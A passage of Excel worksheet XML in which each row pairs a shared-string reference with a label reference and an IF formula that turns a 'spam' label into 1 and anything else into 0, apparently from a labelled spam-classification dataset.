    <row r="4259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4259" t="s">
        <v>6813</v>
      </c>
      <c r="B4259" t="s">
        <v>5294</v>
      </c>
      <c r="C4259" s="1">
        <f>IF(B4259="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4260" t="s">
        <v>7467</v>
      </c>
      <c r="B4260" t="s">
        <v>5294</v>
      </c>
      <c r="C4260" s="1">
        <f>IF(B4260="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4261" t="s">
        <v>9284</v>
      </c>
      <c r="B4261" t="s">
        <v>5294</v>
      </c>
      <c r="C4261" s="1">
        <f>IF(B4261="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4262" t="s">
        <v>9285</v>
      </c>
      <c r="B4262" t="s">
        <v>5294</v>
      </c>
      <c r="C4262" s="1">
        <f>IF(B4262="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4263" t="s">
        <v>9286</v>
      </c>
      <c r="B4263" t="s">
        <v>5294</v>
      </c>
      <c r="C4263" s="1">
        <f>IF(B4263="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4264" t="s">
        <v>9287</v>
      </c>
      <c r="B4264" t="s">
        <v>5294</v>
      </c>
      <c r="C4264" s="1">
        <f>IF(B4264="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4265" t="s">
        <v>9288</v>
      </c>
      <c r="B4265" t="s">
        <v>5294</v>
      </c>
      <c r="C4265" s="1">
        <f>IF(B4265="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4266" t="s">
        <v>9289</v>
      </c>
      <c r="B4266" t="s">
        <v>5294</v>
      </c>
      <c r="C4266" s="1">
        <f>IF(B4266="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4267" t="s">
        <v>9290</v>
      </c>
      <c r="B4267" t="s">
        <v>5294</v>
      </c>
      <c r="C4267" s="1">
        <f>IF(B4267="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4268" t="s">
        <v>9291</v>
      </c>
      <c r="B4268" t="s">
        <v>5294</v>
      </c>
      <c r="C4268" s="1">
        <f>IF(B4268="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4269" t="s">
        <v>9292</v>
      </c>
      <c r="B4269" t="s">
        <v>5294</v>
      </c>
      <c r="C4269" s="1">
        <f>IF(B4269="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4270" t="s">
        <v>9293</v>
      </c>
      <c r="B4270" t="s">
        <v>5294</v>
      </c>
      <c r="C4270" s="1">
        <f>IF(B4270="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4271" t="s">
        <v>9294</v>
      </c>
      <c r="B4271" t="s">
        <v>5294</v>
      </c>
      <c r="C4271" s="1">
        <f>IF(B4271="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4272" t="s">
        <v>9295</v>
      </c>
      <c r="B4272" t="s">
        <v>5297</v>
      </c>
      <c r="C4272" s="1">
        <f>IF(B4272="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4273" t="s">
        <v>9296</v>
      </c>
      <c r="B4273" t="s">
        <v>5294</v>
      </c>
      <c r="C4273" s="1">
        <f>IF(B4273="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4274" t="s">
        <v>9297</v>
      </c>
      <c r="B4274" t="s">
        <v>5294</v>
      </c>
      <c r="C4274" s="1">
        <f>IF(B4274="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4275" t="s">
        <v>9298</v>
      </c>
      <c r="B4275" t="s">
        <v>5294</v>
      </c>
      <c r="C4275" s="1">
        <f>IF(B4275="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4276" t="s">
        <v>9299</v>
      </c>
      <c r="B4276" t="s">
        <v>5294</v>
      </c>
      <c r="C4276" s="1">
        <f>IF(B4276="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4277" t="s">
        <v>9300</v>
      </c>
      <c r="B4277" t="s">
        <v>5294</v>
      </c>
      <c r="C4277" s="1">
        <f>IF(B4277="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4278" t="s">
        <v>9301</v>
      </c>
      <c r="B4278" t="s">
        <v>5294</v>
      </c>
      <c r="C4278" s="1">
        <f>IF(B4278="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4279" t="s">
        <v>9302</v>
      </c>
      <c r="B4279" t="s">
        <v>5294</v>
      </c>
      <c r="C4279" s="1">
        <f>IF(B4279="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4280" t="s">
        <v>9303</v>
      </c>
      <c r="B4280" t="s">
        <v>5297</v>
      </c>
      <c r="C4280" s="1">
        <f>IF(B4280="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4281" t="s">
        <v>5304</v>
      </c>
      <c r="B4281" t="s">
        <v>5297</v>
      </c>
      <c r="C4281" s="1">
        <f>IF(B4281="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4282" t="s">
        <v>9304</v>
      </c>
      <c r="B4282" t="s">
        <v>5294</v>
      </c>
      <c r="C4282" s="1">
        <f>IF(B4282="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4283" t="s">
        <v>9305</v>
      </c>
      <c r="B4283" t="s">
        <v>5294</v>
      </c>
      <c r="C4283" s="1">
        <f>IF(B4283="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4284" t="s">
        <v>9306</v>
      </c>
      <c r="B4284" t="s">
        <v>5294</v>
      </c>
      <c r="C4284" s="1">
        <f>IF(B4284="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4285" t="s">
        <v>9307</v>
      </c>
      <c r="B4285" t="s">
        <v>5294</v>
      </c>
      <c r="C4285" s="1">
        <f>IF(B4285="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4286" t="s">
        <v>9308</v>
      </c>
      <c r="B4286" t="s">
        <v>5294</v>
      </c>
      <c r="C4286" s="1">
        <f>IF(B4286="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4287" t="s">
        <v>9309</v>
      </c>
      <c r="B4287" t="s">
        <v>5294</v>
      </c>
      <c r="C4287" s="1">
        <f>IF(B4287="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4288" t="s">
        <v>9310</v>
      </c>
      <c r="B4288" t="s">
        <v>5294</v>
      </c>
      <c r="C4288" s="1">
        <f>IF(B4288="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4289" t="s">
        <v>9311</v>
      </c>
      <c r="B4289" t="s">
        <v>5294</v>
      </c>
      <c r="C4289" s="1">
        <f>IF(B4289="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4290" t="s">
        <v>9312</v>
      </c>
      <c r="B4290" t="s">
        <v>5294</v>
      </c>
      <c r="C4290" s="1">
        <f>IF(B4290="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4291" t="s">
        <v>9313</v>
      </c>
      <c r="B4291" t="s">
        <v>5294</v>
      </c>
      <c r="C4291" s="1">
        <f>IF(B4291="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4292" t="s">
        <v>9314</v>
      </c>
      <c r="B4292" t="s">
        <v>5294</v>
      </c>
      <c r="C4292" s="1">
        <f>IF(B4292="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4293" t="s">
        <v>9315</v>
      </c>
      <c r="B4293" t="s">
        <v>5294</v>
      </c>
      <c r="C4293" s="1">
        <f>IF(B4293="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4294" t="s">
        <v>9316</v>
      </c>
      <c r="B4294" t="s">
        <v>5294</v>
      </c>
      <c r="C4294" s="1">
        <f>IF(B4294="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4295" t="s">
        <v>9317</v>
      </c>
      <c r="B4295" t="s">
        <v>5297</v>
      </c>
      <c r="C4295" s="1">
        <f>IF(B4295="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4296" t="s">
        <v>5564</v>
      </c>
      <c r="B4296" t="s">
        <v>5297</v>
      </c>
      <c r="C4296" s="1">
        <f>IF(B4296="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4297" t="s">
        <v>9318</v>
      </c>
      <c r="B4297" t="s">
        <v>5297</v>
      </c>
      <c r="C4297" s="1">
        <f>IF(B4297="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4298" t="s">
        <v>9319</v>
      </c>
      <c r="B4298" t="s">
        <v>5297</v>
      </c>
      <c r="C4298" s="1">
        <f>IF(B4298="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4299" t="s">
        <v>7171</v>
      </c>
      <c r="B4299" t="s">
        <v>5297</v>
      </c>
      <c r="C4299" s="1">
        <f>IF(B4299="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4300" t="s">
        <v>5589</v>
      </c>
      <c r="B4300" t="s">
        <v>5294</v>
      </c>
      <c r="C4300" s="1">
        <f>IF(B4300="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4301" t="s">
        <v>9320</v>
      </c>
      <c r="B4301" t="s">
        <v>5294</v>
      </c>
      <c r="C4301" s="1">
        <f>IF(B4301="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4302" t="s">
        <v>9321</v>
      </c>
      <c r="B4302" t="s">
        <v>5294</v>
      </c>
      <c r="C4302" s="1">
        <f>IF(B4302="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4303" t="s">
        <v>9322</v>
      </c>
      <c r="B4303" t="s">
        <v>5294</v>
      </c>
      <c r="C4303" s="1">
        <f>IF(B4303="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4304" t="s">
        <v>9323</v>
      </c>
      <c r="B4304" t="s">
        <v>5294</v>
      </c>
      <c r="C4304" s="1">
        <f>IF(B4304="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4305" t="s">
        <v>9324</v>
      </c>
      <c r="B4305" t="s">
        <v>5294</v>
      </c>
      <c r="C4305" s="1">
        <f>IF(B4305="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4306" t="s">
        <v>9325</v>
      </c>
      <c r="B4306" t="s">
        <v>5294</v>
      </c>
      <c r="C4306" s="1">
        <f>IF(B4306="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4307" t="s">
        <v>9326</v>
      </c>
      <c r="B4307" t="s">
        <v>5294</v>
      </c>
      <c r="C4307" s="1">
        <f>IF(B4307="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4308" t="s">
        <v>9327</v>
      </c>
      <c r="B4308" t="s">
        <v>5294</v>
      </c>
      <c r="C4308" s="1">
        <f>IF(B4308="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4309" t="s">
        <v>9328</v>
      </c>
      <c r="B4309" t="s">
        <v>5294</v>
      </c>
      <c r="C4309" s="1">
        <f>IF(B4309="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4310" t="s">
        <v>9329</v>
      </c>
      <c r="B4310" t="s">
        <v>5294</v>
      </c>
      <c r="C4310" s="1">
        <f>IF(B4310="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4311" t="s">
        <v>6339</v>
      </c>
      <c r="B4311" t="s">
        <v>5297</v>
      </c>
      <c r="C4311" s="1">
        <f>IF(B4311="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4312" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4312" t="s">
        <v>9330</v>
      </c>
      <c r="B4312" t="s">
        <v>5294</v>
      </c>
      <c r="C4312" s="1">
        <f>IF(B4312="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4313" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4313" t="s">
        <v>9331</v>
      </c>
      <c r="B4313" t="s">
        <v>5294</v>
      </c>
      <c r="C4313" s="1">
        <f>IF(B4313="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4314" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4314" t="s">
        <v>9332</v>
      </c>
      <c r="B4314" t="s">
        <v>5294</v>
      </c>
      <c r="C4314" s="1">
        <f>IF(B4314="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4315" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4315" t="s">
        <v>9333</v>
      </c>
      <c r="B4315" t="s">
        <v>5294</v>
      </c>
      <c r="C4315" s="1">
        <f>IF(B4315="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4316" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4316" t="s">
        <v>9334</v>
      </c>
      <c r="B4316" t="s">
        <v>5294</v>
      </c>
      <c r="C4316" s="1">
        <f>IF(B4316="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4317" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4317" t="s">
        <v>9335</v>
      </c>
      <c r="B4317" t="s">
        <v>5294</v>
      </c>
      <c r="C4317" s="1">
        <f>IF(B4317="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4318" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4318" t="s">
        <v>9336</v>
      </c>
      <c r="B4318" t="s">
        <v>5294</v>
      </c>
      <c r="C4318" s="1">
        <f>IF(B4318="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4319" t="s">
        <v>9337</v>
      </c>
      <c r="B4319" t="s">
        <v>5294</v>
      </c>
      <c r="C4319" s="1">
        <f>IF(B4319="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4320" t="s">
        <v>9338</v>
      </c>
      <c r="B4320" t="s">
        <v>5294</v>
      </c>
      <c r="C4320" s="1">
        <f>IF(B4320="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4321" t="s">
        <v>9339</v>
      </c>
      <c r="B4321" t="s">
        <v>5294</v>
      </c>
      <c r="C4321" s="1">
        <f>IF(B4321="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4322" t="s">
        <v>9340</v>
      </c>
      <c r="B4322" t="s">
        <v>5294</v>
      </c>
      <c r="C4322" s="1">
        <f>IF(B4322="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4323" t="s">
        <v>9341</v>
      </c>
      <c r="B4323" t="s">
        <v>5294</v>
      </c>
      <c r="C4323" s="1">
        <f>IF(B4323="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4324" t="s">
        <v>9342</v>
      </c>
      <c r="B4324" t="s">
        <v>5294</v>
      </c>
      <c r="C4324" s="1">
        <f>IF(B4324="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4325" t="s">
        <v>6430</v>
      </c>
      <c r="B4325" t="s">
        <v>5294</v>
      </c>
      <c r="C4325" s="1">
        <f>IF(B4325="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4326" t="s">
        <v>9343</v>
      </c>
      <c r="B4326" t="s">
        <v>5294</v>
      </c>
      <c r="C4326" s="1">
        <f>IF(B4326="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4327" t="s">
        <v>9344</v>
      </c>
      <c r="B4327" t="s">
        <v>5294</v>
      </c>
      <c r="C4327" s="1">
        <f>IF(B4327="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4328" t="s">
        <v>9345</v>
      </c>
      <c r="B4328" t="s">
        <v>5294</v>
      </c>
      <c r="C4328" s="1">
        <f>IF(B4328="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4329" t="s">
        <v>9346</v>
      </c>
      <c r="B4329" t="s">
        <v>5297</v>
      </c>
      <c r="C4329" s="1">
        <f>IF(B4329="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4330" t="s">
        <v>9347</v>
      </c>
      <c r="B4330" t="s">
        <v>5294</v>
      </c>
      <c r="C4330" s="1">
        <f>IF(B4330="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4331" t="s">
        <v>9348</v>
      </c>
      <c r="B4331" t="s">
        <v>5294</v>
      </c>
      <c r="C4331" s="1">
        <f>IF(B4331="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4332" t="s">
        <v>9349</v>
      </c>
      <c r="B4332" t="s">
        <v>5294</v>
      </c>
      <c r="C4332" s="1">
        <f>IF(B4332="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4333" t="s">
        <v>9350</v>
      </c>
      <c r="B4333" t="s">
        <v>5294</v>
      </c>
      <c r="C4333" s="1">
        <f>IF(B4333="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4334" t="s">
        <v>9351</v>
      </c>
      <c r="B4334" t="s">
        <v>5294</v>
      </c>
      <c r="C4334" s="1">
        <f>IF(B4334="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4335" t="s">
        <v>9352</v>
      </c>
      <c r="B4335" t="s">
        <v>5294</v>
      </c>
      <c r="C4335" s="1">
        <f>IF(B4335="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4336" t="s">
        <v>9353</v>
      </c>
      <c r="B4336" t="s">
        <v>5294</v>
      </c>
      <c r="C4336" s="1">
        <f>IF(B4336="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4337" t="s">
        <v>9354</v>
      </c>
      <c r="B4337" t="s">
        <v>5294</v>
      </c>
      <c r="C4337" s="1">
        <f>IF(B4337="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4338" t="s">
        <v>9355</v>
      </c>
      <c r="B4338" t="s">
        <v>5294</v>
      </c>
      <c r="C4338" s="1">
        <f>IF(B4338="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4339" t="s">
        <v>9356</v>
      </c>
      <c r="B4339" t="s">
        <v>5294</v>
      </c>
      <c r="C4339" s="1">
        <f>IF(B4339="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4340" t="s">
        <v>9357</v>
      </c>
      <c r="B4340" t="s">
        <v>5294</v>
      </c>
      <c r="C4340" s="1">
        <f>IF(B4340="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4341" t="s">
        <v>9358</v>
      </c>
      <c r="B4341" t="s">
        <v>5294</v>
      </c>
      <c r="C4341" s="1">
        <f>IF(B4341="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4342" t="s">
        <v>9359</v>
      </c>
      <c r="B4342" t="s">
        <v>5294</v>
      </c>
      <c r="C4342" s="1">
        <f>IF(B4342="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4343" t="s">
        <v>9360</v>
      </c>
      <c r="B4343" t="s">
        <v>5294</v>
      </c>
      <c r="C4343" s="1">
        <f>IF(B4343="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4344" t="s">
        <v>9361</v>
      </c>
      <c r="B4344" t="s">
        <v>5294</v>
      </c>
      <c r="C4344" s="1">
        <f>IF(B4344="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4345" t="s">
        <v>9362</v>
      </c>
      <c r="B4345" t="s">
        <v>5294</v>
      </c>
      <c r="C4345" s="1">
        <f>IF(B4345="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4346" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4346" t="s">
        <v>9363</v>
      </c>
      <c r="B4346" t="s">
        <v>5294</v>
      </c>
      <c r="C4346" s="1">
        <f>IF(B4346="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4347" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4347" t="s">
        <v>9364</v>
      </c>
      <c r="B4347" t="s">
        <v>5294</v>
      </c>
      <c r="C4347" s="1">
        <f>IF(B4347="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4348" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4348" t="s">
        <v>5531</v>
      </c>
      <c r="B4348" t="s">
        <v>5297</v>
      </c>
      <c r="C4348" s="1">
        <f>IF(B4348="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4349" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4349" t="s">
        <v>9365</v>
      </c>
      <c r="B4349" t="s">
        <v>5294</v>
      </c>
      <c r="C4349" s="1">
        <f>IF(B4349="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4350" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4350" t="s">
        <v>9366</v>
      </c>
      <c r="B4350" t="s">
        <v>5294</v>
      </c>
      <c r="C4350" s="1">
        <f>IF(B4350="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4351" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4351" t="s">
        <v>9367</v>
      </c>
      <c r="B4351" t="s">
        <v>5294</v>
      </c>
      <c r="C4351" s="1">
        <f>IF(B4351="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4352" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4352" t="s">
        <v>6545</v>
      </c>
      <c r="B4352" t="s">
        <v>5294</v>
      </c>
      <c r="C4352" s="1">
        <f>IF(B4352="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4353" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4353" t="s">
        <v>9368</v>
      </c>
      <c r="B4353" t="s">
        <v>5294</v>
      </c>
      <c r="C4353" s="1">
        <f>IF(B4353="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4354" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4354" t="s">
        <v>9369</v>
      </c>
      <c r="B4354" t="s">
        <v>5294</v>
      </c>
      <c r="C4354" s="1">
        <f>IF(B4354="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4355" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4355" t="s">
        <v>9370</v>
      </c>
      <c r="B4355" t="s">
        <v>5297</v>
      </c>
      <c r="C4355" s="1">
        <f>IF(B4355="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4356" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4356" t="s">
        <v>7114</v>
      </c>
      <c r="B4356" t="s">
        <v>5294</v>
      </c>
      <c r="C4356" s="1">
        <f>IF(B4356="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4357" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4357" t="s">
        <v>9371</v>
      </c>
      <c r="B4357" t="s">
        <v>5294</v>
      </c>
      <c r="C4357" s="1">
        <f>IF(B4357="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4358" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4358" t="s">
        <v>9372</v>
      </c>
      <c r="B4358" t="s">
        <v>5294</v>
      </c>
      <c r="C4358" s="1">
        <f>IF(B4358="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4359" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4359" t="s">
        <v>9373</v>
      </c>
      <c r="B4359" t="s">
        <v>5297</v>
      </c>
      <c r="C4359" s="1">
        <f>IF(B4359="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4360" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4360" t="s">
        <v>9374</v>
      </c>
      <c r="B4360" t="s">
        <v>5294</v>
      </c>
      <c r="C4360" s="1">
        <f>IF(B4360="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4361" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4361" t="s">
        <v>9375</v>
      </c>
      <c r="B4361" t="s">
        <v>5294</v>
      </c>
      <c r="C4361" s="1">
        <f>IF(B4361="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4362" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4362" t="s">
        <v>9376</v>
      </c>
      <c r="B4362" t="s">
        <v>5294</v>
      </c>
      <c r="C4362" s="1">
        <f>IF(B4362="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
